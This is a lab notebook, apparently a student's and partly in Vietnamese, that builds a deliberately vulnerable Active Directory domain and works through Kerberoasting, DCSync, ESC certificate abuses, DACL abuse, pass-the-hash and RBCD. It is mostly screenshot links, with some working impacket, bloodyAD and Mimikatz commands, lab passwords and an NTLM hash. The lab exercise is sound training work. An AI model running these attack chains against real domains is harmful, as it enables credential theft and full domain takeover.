Setup Active Directory Lab

# Setup Active Directory Lab window server 2019: Tan123# `Set-ExecutionPolicy -ExecutionPolicy Bypass -Force` Bỏ dòng cuối cùng trong [https://github.com/WaterExecution/vulnerable-AD-plus](https://github.com/WaterExecution/vulnerable-AD-plus) `Import-Module .\vulnadplus.ps1` `Invoke-VulnAD -UsersLimit 100 -DomainName "doan.com"` #### **1. Enumerate the Domain** ![image](https://hackmd.io/_uploads/Sy7PBGfage.png) ![image 1](https://hackmd.io/_uploads/HJ4tmGzael.png) ![image 2](https://hackmd.io/_uploads/HJNKXfGTeg.png) ![image 3](https://hackmd.io/_uploads/HkVFQfM6gg.png) ![image 4](https://hackmd.io/_uploads/SyEFQzf6ex.png) ![image 5](https://hackmd.io/_uploads/r1VtmMfpex.png) #### **2. RID Cycling to Enumerate Users** ![image 6](https://hackmd.io/_uploads/S1oiXGM6ge.png) ![image 7](https://hackmd.io/_uploads/HJoiXfz6lg.png) ![image 8](https://hackmd.io/_uploads/Hyoi7zfagx.png) #### **3.Anonymous LDAP Queries** ![image 9](https://hackmd.io/_uploads/S1KamMGpxx.png) ![image 10](https://hackmd.io/_uploads/r1KT7zG6ll.png) ![image 11](https://hackmd.io/_uploads/rktpQMf6eg.png) #### **4.AS-REP Roasting Usernames** ![image 12](https://hackmd.io/_uploads/ryllVfGaex.png) ![image 13](https://hackmd.io/_uploads/SyxxVzfTlg.png) ![image 14](https://hackmd.io/_uploads/B1lxVzG6gx.png) ![image 15](https://hackmd.io/_uploads/Skel4MMall.png) ![image 16](https://hackmd.io/_uploads/SyleNMG6lx.png) ![image 17](https://hackmd.io/_uploads/H1geVzzTgg.png) User florette: ame.florette:martin ![image 18](https://hackmd.io/_uploads/ByrWEzzaex.png) ![image 19](https://hackmd.io/_uploads/SyHWNMGpgl.png) ![image 20](https://hackmd.io/_uploads/B1BbEzGpgx.png) User atalanta.odele: ![image 21](https://hackmd.io/_uploads/B1WENzMpgx.png) ![image 22](https://hackmd.io/_uploads/SyzNEMfTle.png) ![image 23](https://hackmd.io/_uploads/HJf44zzpeg.png) #### **5. Enumerate the Domain Account Policy** ![image 24](https://hackmd.io/_uploads/SyKUNzfTge.png) #### **6. Kerberoasting Attack** ![image 25](https://hackmd.io/_uploads/BkM64Mfpge.png) ![image 26](https://hackmd.io/_uploads/rkMaEMf6ee.png) ![image 27](https://hackmd.io/_uploads/Hkfa4zGaee.png) ![image 28](https://hackmd.io/_uploads/SkMa4GfTgx.png) ![image 29](https://hackmd.io/_uploads/S1z6NGfpxx.png) ![image 30](https://hackmd.io/_uploads/B1zaNMMplx.png) #### **7. Enumerating Public SMB Shares** ![image 31](https://hackmd.io/_uploads/HJQgSfMagl.png) ![image 32](https://hackmd.io/_uploads/S1QeBMf6xe.png) ![image 33](https://hackmd.io/_uploads/SkQeBMGaeg.png) #### **8. Credential Spraying** ![image 34](https://hackmd.io/_uploads/H1bMrzzaxe.png) ![image 35](https://hackmd.io/_uploads/HJbfrfMplg.png) #### **9. Bloodhound** ![image 36](https://hackmd.io/_uploads/Sk86vvzaxg.png) ![image 37](https://hackmd.io/_uploads/SyLaPwGael.png) ![image 38](https://hackmd.io/_uploads/Sy8awDf6xx.png) ![image 39](https://hackmd.io/_uploads/H1UTwvGaxe.png) #### **10. Credential Dumping: DCSync Attack** ![image 40](https://hackmd.io/_uploads/r1AyOPzTel.png) ![image 41](https://hackmd.io/_uploads/r1AJdPz6el.png) ![image 42](https://hackmd.io/_uploads/BJ0JOwz6xe.png) ![image 43](https://hackmd.io/_uploads/BkCyODfTxg.png) ![image 44](https://hackmd.io/_uploads/rJC1ODf6ee.png) ![image 45](https://hackmd.io/_uploads/B1CkuPf6xe.png) #### **11. Credential Dumping: NTDS.dit** ![image 46](https://hackmd.io/_uploads/BJzzdPz6le.png) ![image 47](https://hackmd.io/_uploads/ryGGdvM6lx.png) ![image 48](https://hackmd.io/_uploads/Syzf_Pzaeg.png) #### **12. Credential Dumping: Local Security Authority (LSA|LSASS.EXE)** ![image 49](https://hackmd.io/_uploads/SJLV_vfTee.png) #### **13. Credential Dumping: SAM** ![image 50](https://hackmd.io/_uploads/ry5iuwz6gg.png) #### **14. Shadow Credentials Attack** alica.kai:Password2@ ![image 51](https://hackmd.io/_uploads/SkGsKDGagg.png) ![image 52](https://hackmd.io/_uploads/By-jYPfTeg.png) ![image 53](https://hackmd.io/_uploads/HyMjFwMTeg.png) ![image 54](https://hackmd.io/_uploads/BJGitwGTel.png) ![image 55](https://hackmd.io/_uploads/BJGoKvMagg.png) ![image 56](https://hackmd.io/_uploads/rJGoYwzTgl.png) ![image 57](https://hackmd.io/_uploads/HkGsFvf6ee.png) ![image 58](https://hackmd.io/_uploads/rJGitvfaeg.png) ![image 59](https://hackmd.io/_uploads/HkMjYvGpeg.png) ![image 60](https://hackmd.io/_uploads/HyMsFPMage.png) #### **15. Cài CA** ![image 61](https://hackmd.io/_uploads/H1XaYDM6gg.png) ![image 62](https://hackmd.io/_uploads/Hk7aYPG6xx.png) ![image 63](https://hackmd.io/_uploads/rJQ6Yvz6xl.png) ![image 64](https://hackmd.io/_uploads/BJXptwM6el.png) ![image 65](https://hackmd.io/_uploads/ry7aFDGTee.png) ![image 66](https://hackmd.io/_uploads/BkXpYvG6ll.png) ![image 67](https://hackmd.io/_uploads/rkXpFDfple.png) ![image 68](https://hackmd.io/_uploads/Bkm6twGTex.png) ![image 69](https://hackmd.io/_uploads/BkXptvzTge.png) ![image 70](https://hackmd.io/_uploads/Hym6twfaxg.png) ![image 71](https://hackmd.io/_uploads/SkmpYPz6le.png) ![image 72](https://hackmd.io/_uploads/By7pKPMTeg.png) ![image 73](https://hackmd.io/_uploads/B1mTKPf6le.png) #### **16. ESC1** ![image 74](https://hackmd.io/_uploads/H1xzk9vMTlx.png) ![image 75](https://hackmd.io/_uploads/ByGJcwfpxe.png) ![image 76](https://hackmd.io/_uploads/HyzkcPMage.png) ![image 77](https://hackmd.io/_uploads/HJf1cvGpxe.png) ![image 78](https://hackmd.io/_uploads/rJfJqDzpxx.png) ![image 79](https://hackmd.io/_uploads/Hyz15Pfpgl.png) ![image 80](https://hackmd.io/_uploads/HJz1cDz6le.png) ![image 81](https://hackmd.io/_uploads/SJfkqvfple.png) ![image 82](https://hackmd.io/_uploads/B1Gy9wMpxx.png) ![image 83](https://hackmd.io/_uploads/HJMk5Pfpxl.png) ![image 84](https://hackmd.io/_uploads/SJGyqwGpxg.png) ![image 85](https://hackmd.io/_uploads/BJGkqPM6eg.png) ![image 86](https://hackmd.io/_uploads/SJMy5PMTxe.png) ![image 87](https://hackmd.io/_uploads/Syzkcvfall.png) ![image 88](https://hackmd.io/_uploads/HJxfk5Dzpeg.png) ![image 89](https://hackmd.io/_uploads/ryGy5vfpgg.png) ![image 90](https://hackmd.io/_uploads/ryMy5DGpge.png) ![image 91](https://hackmd.io/_uploads/HkG1qvMplx.png) ![image 92](https://hackmd.io/_uploads/S1eGycvMage.png) ![image 93](https://hackmd.io/_uploads/S1zkqDGage.png) ![image 94](https://hackmd.io/_uploads/r1WfJ9PGpel.png) #### **17. ESC5** ![image 95](https://hackmd.io/_uploads/ryTm5Dz6ex.png) ![image 96](https://hackmd.io/_uploads/r1p7cwzage.png) ![image 97](https://hackmd.io/_uploads/rkT79vGaex.png) ![image 98](https://hackmd.io/_uploads/rkp75DG6gl.png) ![image 99](https://hackmd.io/_uploads/r16m9Dfage.png) ![image 100](https://hackmd.io/_uploads/rJpX9wMage.png) ![image 101](https://hackmd.io/_uploads/SyaX5vM6el.png) ![image 102](https://hackmd.io/_uploads/r1T7cvMple.png) ![image 94](https://hackmd.io/_uploads/r1WfJ9PGpel.png) #### **18. ESC2** ![image 103](https://hackmd.io/_uploads/Hyq5qPMaeg.png) ![image 104](https://hackmd.io/_uploads/SJ595vzaeg.png) ![image 105](https://hackmd.io/_uploads/Skqcqvz6ll.png) ![image 106](https://hackmd.io/_uploads/r1599wzpex.png) ![image 107](https://hackmd.io/_uploads/BkccqDfagg.png) ![image 108](https://hackmd.io/_uploads/S15qqwzaxl.png) ![image 109](https://hackmd.io/_uploads/B1qq5vGplg.png) ![image 110](https://hackmd.io/_uploads/S15c5wMTeg.png) ![image 111](https://hackmd.io/_uploads/SJ55qDzaex.png) ![image 112](https://hackmd.io/_uploads/rJ5ccPMpgg.png) ![image 113](https://hackmd.io/_uploads/Byc5cDGTxe.png) ![image 114](https://hackmd.io/_uploads/r19qqPGaee.png) ![image 115](https://hackmd.io/_uploads/r1cccPGpgl.png) ![image 116](https://hackmd.io/_uploads/HJq9cwGplx.png) ![image 117](https://hackmd.io/_uploads/rkq9cwzpex.png) ![image 118](https://hackmd.io/_uploads/r1q5qPM6gg.png) ![image 119](https://hackmd.io/_uploads/By559vMpxx.png) ![image 120](https://hackmd.io/_uploads/rkcqqwfTgg.png) ![image 121](https://hackmd.io/_uploads/Sy9ccvfael.png) ![image 122](https://hackmd.io/_uploads/BJ5c9Dz6le.png) ![image 123](https://hackmd.io/_uploads/Hkq9cwz6eg.png) #### **19. ESC3** ![image 124](https://hackmd.io/_uploads/HJsacwMTlx.png) ![image 125](https://hackmd.io/_uploads/H1jTcDGaeg.png) ![image 126](https://hackmd.io/_uploads/r1sacvzTxg.png) ![image 127](https://hackmd.io/_uploads/B1sT5DGTge.png) ![image 128](https://hackmd.io/_uploads/rJspcPzaex.png) ![image 129](https://hackmd.io/_uploads/B1sa9Pzalg.png) ![Screenshot_2025-08-27_153628](https://hackmd.io/_uploads/B1dAcDfpgl.png) ![image 130](https://hackmd.io/_uploads/Hy2yiPfTeg.png) ![image 131](https://hackmd.io/_uploads/Sk3yswz6xl.png) ![image 132](https://hackmd.io/_uploads/Hy5eovfple.png) ![image 133](https://hackmd.io/_uploads/BJceiPG6ex.png) ![image 134](https://hackmd.io/_uploads/Hk9goPM6eg.png) ![image 135](https://hackmd.io/_uploads/rkcgjvMpex.png) ![image 136](https://hackmd.io/_uploads/rJ5ejPMpll.png) ![image 137](https://hackmd.io/_uploads/B15gsDMaex.png) ![image 138](https://hackmd.io/_uploads/Hy5xsPz6xx.png) ![image 139](https://hackmd.io/_uploads/r1qeoDzplg.png) ![image 123](https://hackmd.io/_uploads/Hkq9cwz6eg.png) #### **20. ESC16** ame.florette:martin ![image 140](https://hackmd.io/_uploads/S13NoPMael.png) bryn.kin ![image 141](https://hackmd.io/_uploads/BywiivzTgl.png) ![image 142](https://hackmd.io/_uploads/H1PjsPz6gl.png) ![image 143](https://hackmd.io/_uploads/r1Dojvzple.png) ![image 144](https://hackmd.io/_uploads/ryDsjwMTlg.png) ![image 145](https://hackmd.io/_uploads/r1PioPfpgl.png) ![image 146](https://hackmd.io/_uploads/ryPooPzTxg.png) ![image 147](https://hackmd.io/_uploads/ByDjoDGale.png) ![image 148](https://hackmd.io/_uploads/BJPsiPMTxg.png) ![image 149](https://hackmd.io/_uploads/B1vjjDMpxe.png) ![image 150](https://hackmd.io/_uploads/ByDoivG6el.png) ![image 151](https://hackmd.io/_uploads/BkvooDzTel.png) ![image 152](https://hackmd.io/_uploads/HkxPjiDGTxe.png) 70a65354fd80b2180fb0f39920d16d1a ![image 153](https://hackmd.io/_uploads/H1YaiPG6ge.png) ![image 154](https://hackmd.io/_uploads/BJYaiwMaeg.png) ![image 155](https://hackmd.io/_uploads/SkOajDG6xe.png) ![image 156](https://hackmd.io/_uploads/B1OpjDfplg.png) ![image 157](https://hackmd.io/_uploads/SJdaowzpel.png) ![image 94](https://hackmd.io/_uploads/r1WfJ9PGpel.png) #### **21. Abusing AD-DACL: WriteOwner** **User Owns WriteOwner Permission on a Group** ![image 158](https://hackmd.io/_uploads/HyGYtsfpex.png) ![image 159](https://hackmd.io/_uploads/BJftYizalg.png) ![image 160](https://hackmd.io/_uploads/HkfFtjGTex.png) ![image 161](https://hackmd.io/_uploads/S1MYKozTgl.png) ![image 162](https://hackmd.io/_uploads/HkMFYjz6lx.png) ![image 170](https://hackmd.io/_uploads/ByL9tsGaeg.png) ![image 171](https://hackmd.io/_uploads/HkI5tifpll.png) ![image 172](https://hackmd.io/_uploads/ryU9YjG6le.png) CN=IT ADMINS,CN=USERS,DC=DOAN,DC=COM ![image 173](https://hackmd.io/_uploads/BkMsFjfTgg.png) ![image 165](https://hackmd.io/_uploads/By0jKof6gx.png) ``` impacket-owneredit -action write -new-owner 'ame.florette' -target-dn 'CN=IT ADMINS,CN=USERS,DC=DOAN,DC=COM' '[doan.com](http://doan.com/)'/'ame.florette':'martin' -dc-ip 192.168.134.10 ``` ``` impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'ame.florette' -target-dn 'CN=IT ADMINS,CN=USERS,DC=DOAN,DC=COM' '[doan.com](http://doan.com/)'/'ame.florette':'martin' -dc-ip 192.168.134.10 ``` ``` bloodyAD --host "192.168.134.10" -d "[doan.com](http://doan.com/)" -u "ame.florette" -p "martin" add groupMember "IT Admins" "ame.florette" ``` ![image 174](https://hackmd.io/_uploads/S1X1qofTgl.png) ![image 168](https://hackmd.io/_uploads/Hyc1csGalg.png) ![image 175](https://hackmd.io/_uploads/SkZeqof6lg.png) **User Owns WriteOwner Permission on Another User** ![image 176](https://hackmd.io/_uploads/H1kzqiMalg.png) ![image 177](https://hackmd.io/_uploads/BkkM5izagl.png) ![image 178](https://hackmd.io/_uploads/SJJfcsf6ee.png) ![image 179](https://hackmd.io/_uploads/H1Jf5iM6xg.png) ![image 180](https://hackmd.io/_uploads/rkyMqoz6le.png) ![image 181](https://hackmd.io/_uploads/HJyzqjfpxg.png) ![image 182](https://hackmd.io/_uploads/B1kz9ifagl.png) ![image 183](https://hackmd.io/_uploads/HkyzcofTxg.png) ``` impacket-owneredit -action write -new-owner 'atalanta.odele' -target-dn 'CN=GREER BLISS,CN=USERS,DC=DOAN,DC=COM' '[doan.com](http://doan.com/)'/'atalanta.odele':'freddy' -dc-ip 192.168.134.10 ``` ``` impacket-dacledit -action 'write' -rights 'FullControl' -principal 'atalanta.odele' -target-dn 'CN=GREER BLISS,CN=USERS,DC=DOAN,DC=COM' '[doan.com](http://doan.com/)'/'atalanta.odele':'freddy' -dc-ip 192.168.134.10 ``` ![image 184](https://hackmd.io/_uploads/r1Ut9jGaeg.png) ![image 185](https://hackmd.io/_uploads/rJUF9jMpgg.png) ![image 186](https://hackmd.io/_uploads/HJIY9iMTll.png) ![image 187](https://hackmd.io/_uploads/BJIF9jGTge.png) ![image 188](https://hackmd.io/_uploads/Hy8KcjM6gl.png) ![image 189](https://hackmd.io/_uploads/SyLK5jM6xe.png) ![image 190](https://hackmd.io/_uploads/BJ8F9ofaxx.png) ![image 191](https://hackmd.io/_uploads/HkLtqoGage.png) #### **22. Abusing AD-DACL: WriteDacl** **User Owns WriteDacl Permission on a Group** ![image 158](https://hackmd.io/_uploads/HyGYtsfpex.png) ![image 159](https://hackmd.io/_uploads/BJftYizalg.png) ![image 160](https://hackmd.io/_uploads/HkfFtjGTex.png) ![image 161](https://hackmd.io/_uploads/S1MYKozTgl.png) ![image 192](https://hackmd.io/_uploads/HkTp9szpee.png) ![image 193](https://hackmd.io/_uploads/By6a5jzaee.png) ![image 194](https://hackmd.io/_uploads/S1pa5jz6lx.png) ![image 195](https://hackmd.io/_uploads/rJapcozTlg.png) ![image 196](https://hackmd.io/_uploads/BJaT9iG6el.png) ``` impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'ame.florette' -target-dn 'CN=IT ADMINS,CN=USERS,DC=DOAN,DC=COM' '[doan.com](http://doan.com/)'/'ame.florette':'martin' -dc-ip 192.168.134.10 ``` ![image 197](https://hackmd.io/_uploads/rymkjiz6xx.png) ![image 198](https://hackmd.io/_uploads/H1QJisz6ll.png) ![image 199](https://hackmd.io/_uploads/SJX1oof6ge.png) ![image 200](https://hackmd.io/_uploads/rJm1sjf6gg.png) **User Owns WriteDacl Permission on Another User** ![image 176](https://hackmd.io/_uploads/H1kzqiMalg.png) ![image 177](https://hackmd.io/_uploads/BkkM5izagl.png) ![image 178](https://hackmd.io/_uploads/SJJfcsf6ee.png) ![image 179](https://hackmd.io/_uploads/H1Jf5iM6xg.png) ![image 201](https://hackmd.io/_uploads/By8fsjf6lx.png) ![image 202](https://hackmd.io/_uploads/Hk8fojMTxe.png) ![image 203](https://hackmd.io/_uploads/B1IGsiMaxg.png) ![image 204](https://hackmd.io/_uploads/H1LfoozTgg.png) ![image 205](https://hackmd.io/_uploads/H1Izjsfpgx.png) ![image 185](https://hackmd.io/_uploads/rJUF9jMpgg.png) ![image 206](https://hackmd.io/_uploads/ryUMoizaxl.png) ![image 207](https://hackmd.io/_uploads/SyvzjofTgx.png) ![image 208](https://hackmd.io/_uploads/BywMijz6lx.png) ![image 190](https://hackmd.io/_uploads/BJ8F9ofaxx.png) ![image 191](https://hackmd.io/_uploads/HkLtqoGage.png) #### **23. Abusing AD-DACL: GenericWrite** **User Owns GenericWrite Permission on a Group** ![image 209](https://hackmd.io/_uploads/S1jGvU7plg.png) ![image 210](https://hackmd.io/_uploads/SysMvIX6xg.png) ![image 211](https://hackmd.io/_uploads/SJoGvIXpee.png) ![image 212](https://hackmd.io/_uploads/HynGv8X6xe.png) ![image 213](https://hackmd.io/_uploads/ByoMDUmTxe.png) ![image 214](https://hackmd.io/_uploads/By2Gv87ale.png) ![image 215](https://hackmd.io/_uploads/SJ2fDI7plg.png) ![image 216](https://hackmd.io/_uploads/SJizDIm6gl.png) ![image 217](https://hackmd.io/_uploads/r1jGvUm6ex.png) **User Owns GenericWrite Permission on Another User** ![image 176](https://hackmd.io/_uploads/H1kzqiMalg.png) ![image 177](https://hackmd.io/_uploads/BkkM5izagl.png) ![image 218](https://hackmd.io/_uploads/BJgBD8QTll.png) ![image 219](https://hackmd.io/_uploads/BylBv8Qpeg.png) ![image 220](https://hackmd.io/_uploads/H1xBvI7agg.png) ![image 221](https://hackmd.io/_uploads/ryeBwIQTgl.png) ![image 222](https://hackmd.io/_uploads/BkxSwLQpeg.png) ![image 223](https://hackmd.io/_uploads/HJeBPU7Tel.png) #### **24. Abusing AD-DACL : Generic ALL Permissions** **User Owns Generic ALL Right For A Group** ![image 209](https://hackmd.io/_uploads/S1jGvU7plg.png) ![image 210](https://hackmd.io/_uploads/SysMvIX6xg.png) ![image 211](https://hackmd.io/_uploads/SJoGvIXpee.png) ![image 224](https://hackmd.io/_uploads/BJVwD8XTll.png) ![image 225](https://hackmd.io/_uploads/HyNDv8magg.png) ![image 226](https://hackmd.io/_uploads/rJVvDIQTxe.png) ![image 227](https://hackmd.io/_uploads/r1VwwLm6el.png) ![image 228](https://hackmd.io/_uploads/ryVDD87pel.png) **User Own Generic ALL Right for another user** ![image 176](https://hackmd.io/_uploads/H1kzqiMalg.png) ![image 177](https://hackmd.io/_uploads/BkkM5izagl.png) ![image 229](https://hackmd.io/_uploads/HkHtPIQpeg.png) ![image 230](https://hackmd.io/_uploads/BJrFPU7pgg.png) ![image 231](https://hackmd.io/_uploads/HkBKvU76xe.png) ![image 232](https://hackmd.io/_uploads/H1HFwLX6gg.png) ![image 233](https://hackmd.io/_uploads/rJBFDU7axe.png) #### **25. Abusing AD-DACL: AllExtendedRights** **User Owns AllExtendedRights Permission** ![image 234](https://hackmd.io/_uploads/rkYowIX6gl.png) ![image 235](https://hackmd.io/_uploads/rytoPI7all.png) ![image 236](https://hackmd.io/_uploads/SkKswI7Teg.png) ![image 237](https://hackmd.io/_uploads/SkKoDUmpxx.png) ![image 238](https://hackmd.io/_uploads/HyFjvUX6xx.png) ![image 239](https://hackmd.io/_uploads/BJFoDLQTgx.png) ![image 240](https://hackmd.io/_uploads/BytovIXpxe.png) ![image 241](https://hackmd.io/_uploads/H1KoDL7ple.png) #### **26. Abusing AD-DACL: ForceChangePassword** **User Owns ForceChangePassword Rights** ![image 176](https://hackmd.io/_uploads/H1kzqiMalg.png) ![image 177](https://hackmd.io/_uploads/BkkM5izagl.png) ![image 242](https://hackmd.io/_uploads/ryATDIX6el.png) ![image 243](https://hackmd.io/_uploads/SJRpwUXplx.png) ![image 244](https://hackmd.io/_uploads/SJAavUmaxl.png) ![image 245](https://hackmd.io/_uploads/HyCaPIQTee.png) #### **27. Diamond Ticket Attack: Abusing kerberos Trust** ![image 246](https://hackmd.io/_uploads/Syu1uU7Txg.png) ![image 247](https://hackmd.io/_uploads/HyuJdU7aeg.png) ![image 248](https://hackmd.io/_uploads/r1uJOUXTll.png) ![image 249](https://hackmd.io/_uploads/S1O1O8Xael.png) ![image 250](https://hackmd.io/_uploads/SJukuIQTll.png) ![image 251](https://hackmd.io/_uploads/ByuJuLmaxe.png) ![image 252](https://hackmd.io/_uploads/Sku1OLQTll.png) ![image 253](https://hackmd.io/_uploads/SkdJd8mTxe.png) #### **28. Domain Persistence: Golden Ticket Attack** ![image 254](https://hackmd.io/_uploads/SkmWdI7ale.png) ![image 255](https://hackmd.io/_uploads/BJm-O876le.png) sudo apt install krb5-user -y ![image 256](https://hackmd.io/_uploads/rJlGu8Qplg.png) ![image 257](https://hackmd.io/_uploads/rylz_UXaeg.png) ![image 258](https://hackmd.io/_uploads/ryeGdLmpgg.png) #### **29. Domain Persistence: AdminSDHolder Attack** adam.kai:Password2@ ![image 259](https://hackmd.io/_uploads/Bk6VOLX6xg.png) ![image 260](https://hackmd.io/_uploads/ByaNu8mTlx.png) ![image 261](https://hackmd.io/_uploads/BJpN_LXpex.png) ![image 262](https://hackmd.io/_uploads/rkp4OIQTxx.png) ![image 263](https://hackmd.io/_uploads/BJTEd8maxl.png) ![image 264](https://hackmd.io/_uploads/SJpVu8mage.png) ![image 265](https://hackmd.io/_uploads/r1aE_U7alg.png) `REG ADD HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /V AdminSDProtectFrequency /T REG_DWORD /F /D 300` ![image 266](https://hackmd.io/_uploads/rJ-8dIm6le.png) (2 bước add reg bằng GUI không cần) ![image 267](https://hackmd.io/_uploads/ryZDdUQpxe.png) ![image 268](https://hackmd.io/_uploads/SkWP_UQpge.png) ![image 269](https://hackmd.io/_uploads/HkZvOI7ael.png) ![Screenshot_2025-09-12_110553](https://hackmd.io/_uploads/HJbDOUX6lg.png) Khi xoá account adam.kai khỏi security sau 5 phút sẽ tự động được add vào ![image 270](https://hackmd.io/_uploads/HJr__UQagg.png) #### **30. Lateral Movement: Pass the Hash Attack** ![image 271](https://hackmd.io/_uploads/SJCYO87pxx.png) Administrator:500:aad3b435b51404eeaad3b435b51404ee:8fbdceeaaee125a2b744b72fd05a8a7f::: ![image 272](https://hackmd.io/_uploads/Bkhc_IXaxx.png) ![image 273](https://hackmd.io/_uploads/H1h5uLXaxl.png) ![image 274](https://hackmd.io/_uploads/B1n9OLmTlg.png) ![image 275](https://hackmd.io/_uploads/B125O8m6gl.png) Khai thác từ máy windows 10 user adam.kai:Password123 có quyền local admin đã join domain có tên PCCLIENT Máy Windows server 2019 có tên DC01 Công cụ: Mimikatz https://learn.microsoft.com/en-us/sysinternals/downloads/pstools Cấu hình cho user adam.kai có quyền local admin để có thể chạy được Mimikatz Tạo OU có tên Client ![image](https://hackmd.io/_uploads/rkeGmGfCxg.png) ![image](https://hackmd.io/_uploads/SkYGQGMAll.png) Move máy PCCLIENT sang OU Client ![image](https://hackmd.io/_uploads/By77QzMRxg.png) Vào Group Policy Management, Group Policy Object tạo GPO mới ![image](https://hackmd.io/_uploads/BkbVXMz0el.png) ![image](https://hackmd.io/_uploads/HJbwNGGCxg.png) Sau khi tạo xong Edit ![image](https://hackmd.io/_uploads/ByWSmMz0ee.png) Vào Computer Configuration, Preferences, Local Users and Groups, New, Local Group ![image](https://hackmd.io/_uploads/SylYEGM0gg.png) ![image](https://hackmd.io/_uploads/rkQLmGG0lx.png) Thêm user adam.kai và group name là Administrator Built In ![image](https://hackmd.io/_uploads/Sk7PQMGAeg.png) ![image](https://hackmd.io/_uploads/S1dP7MfCee.png) Sau đó link GPO với OU Client ![image](https://hackmd.io/_uploads/HJr5NMzAgl.png) ![image](https://hackmd.io/_uploads/rJIOmzzAgl.png) ![image](https://hackmd.io/_uploads/BJs_7zfAlg.png) Chạy lại lệnh update chính sách GPO: gpupdate /force ![image](https://hackmd.io/_uploads/BJmsEGzRex.png) Tại máy windows 10 user adam.kai chạy lệnh update chính sách GPO: gpupdate /force, lúc này có thể chạy local admin ![image](https://hackmd.io/_uploads/B1M3NGGClx.png) Test thử .\PsExec.exe \\DC01.doan.com cmd ![image](https://hackmd.io/_uploads/H1G2Bzf0ee.png) log passthehash.log privilege::debug sekurlsa::logonpasswords (crack hash của Administrator nếu đã login, nếu chưa có thể setup DCsync để crack hash) ![image](https://hackmd.io/_uploads/rJu6BGGAel.png) sekurlsa::pth /user:Administrator /domain:doan.com /ntlm:8fbdceeaaee125a2b744b72fd05a8a7f ![image](https://hackmd.io/_uploads/HJMAHGfCel.png) Sau khi chạy pth sẽ hiện 1 cmd của user adam.kai cd C:\Users\adam.kai\Downloads\PSTools .\PsExec.exe \\DC01.doan.com cmd ![image](https://hackmd.io/_uploads/ryXMLMzCle.png) Tại máy client: Mở powershell bằng quyền admin Add-LocalGroupMember -Group Administrators -Member DOAN\adam.kai Muốn xoá chạy Remove-LocalGroupMember -Group "Administrators" -Member "DOAN\adam.kai” #### **31. Lateral Movement: Over Pass the Hash** ![image 271](https://hackmd.io/_uploads/SJCYO87pxx.png) ![image 276](https://hackmd.io/_uploads/rkl6OImpgl.png) ![image 277](https://hackmd.io/_uploads/HJgaO8X6le.png) #### **32. Domain Escalation: Resource Based Constrained Delegation** ![image 278](https://hackmd.io/_uploads/rkvCOI7Txe.png) ![image 279](https://hackmd.io/_uploads/HkvRuIm6xl.png) Password2@ ![image 280](https://hackmd.io/_uploads/HJMeKUX6lx.png) ![image 281](https://hackmd.io/_uploads/SJGet8XTll.png) ![image 282](https://hackmd.io/_uploads/SJfeKL7ple.png) ![image 283](https://hackmd.io/_uploads/S1GlKLmagl.png) ![image 284](https://hackmd.io/_uploads/HkGxK8QTlg.png) ![image 285](https://hackmd.io/_uploads/ByfetL76ll.png) ![image 286](https://hackmd.io/_uploads/HyzeY87pxx.png) ``` unset KRB5CCNAME impacket-addcomputer [doan.com/adam.kai:Password2@](http://doan.com/adam.kai:Password2@) -computer-name fakepc -computer-pass Password@123 -dc-ip 192.168.134.10 impacket-rbcd [doan.com/adam.kai:Password2@](http://doan.com/adam.kai:Password2@) -action write -delegate-to 'DC01$' -delegate-from 'fakepc$' -dc-ip 192.168.134.10 impacket-getST [doan.com/'fakepc$':Password@123](http://doan.com/'fakepc$':Password@123) -spn cifs/DC01.doan.com -impersonate administrator -dc-ip 192.168.134.10 export KRB5CCNAME=administrator@cifs_DC01.doan.com@DOAN.COM.ccache impacket-psexec [doan.com/administrator@DC01.doan.com](http://doan.com/administrator@DC01.doan.com) -k -no-pass -dc-ip 192.168.134.10 ``` ![image 287](https://hackmd.io/_uploads/By3-FUmTeg.png) ![image 288](https://hackmd.io/_uploads/rJn-KI7Tlg.png) #### **33. ESC4** ![Screenshot 2025-10-08 150941](https://hackmd.io/_uploads/HytEhomaee.png) ![Screenshot 2025-10-08 151010](https://hackmd.io/_uploads/BJcE3smTex.png) ![Screenshot 2025-10-08 151041](https://hackmd.io/_uploads/HJtNhiXaxx.png) ![Screenshot 2025-10-08 151112](https://hackmd.io/_uploads/SJcE2smaxe.png) ![Screenshot 2025-10-08 151143](https://hackmd.io/_uploads/rkFEhiXTll.png) ![Screenshot 2025-10-08 151208](https://hackmd.io/_uploads/BkqE2imagg.png) ![Screenshot 2025-10-08 151238](https://hackmd.io/_uploads/HkYV3smTxg.png) ![Screenshot 2025-10-08 151257](https://hackmd.io/_uploads/ryOVhsQpex.png) ![Screenshot 2025-10-08 151325](https://hackmd.io/_uploads/BJYN2jQ6gx.png) ![Screenshot 2025-10-08 151408](https://hackmd.io/_uploads/HJgFN2smael.png) ![Screenshot 2025-10-08 151424](https://hackmd.io/_uploads/Sk543oX6gx.png) ![Screenshot 2025-10-08 151515](https://hackmd.io/_uploads/r1YE2sQ6le.png) ![Screenshot 2025-10-08 151545](https://hackmd.io/_uploads/Byq43imale.png) ![Screenshot 2025-10-08 151823](https://hackmd.io/_uploads/B1cEnjQpgl.png) ![Screenshot 2025-10-08 152342](https://hackmd.io/_uploads/ByqNniQpxg.png) ![Screenshot 2025-10-08 152432](https://hackmd.io/_uploads/rJljhiQ6ex.png) ![Screenshot 2025-10-08 153614](https://hackmd.io/_uploads/HykpnjQpgl.png) ![Screenshot 2025-10-08 153649](https://hackmd.io/_uploads/Sk762sXTlx.png) ![Screenshot 2025-10-08 153826](https://hackmd.io/_uploads/S1hTnsQalg.png) ![Screenshot 2025-10-08 160734](https://hackmd.io/_uploads/rk8CnomTll.png) ![Screenshot 2025-10-08 160824](https://hackmd.io/_uploads/Bk9C2j7pgl.png) ![Screenshot 2025-10-08 161029](https://hackmd.io/_uploads/Hk11ToXael.png)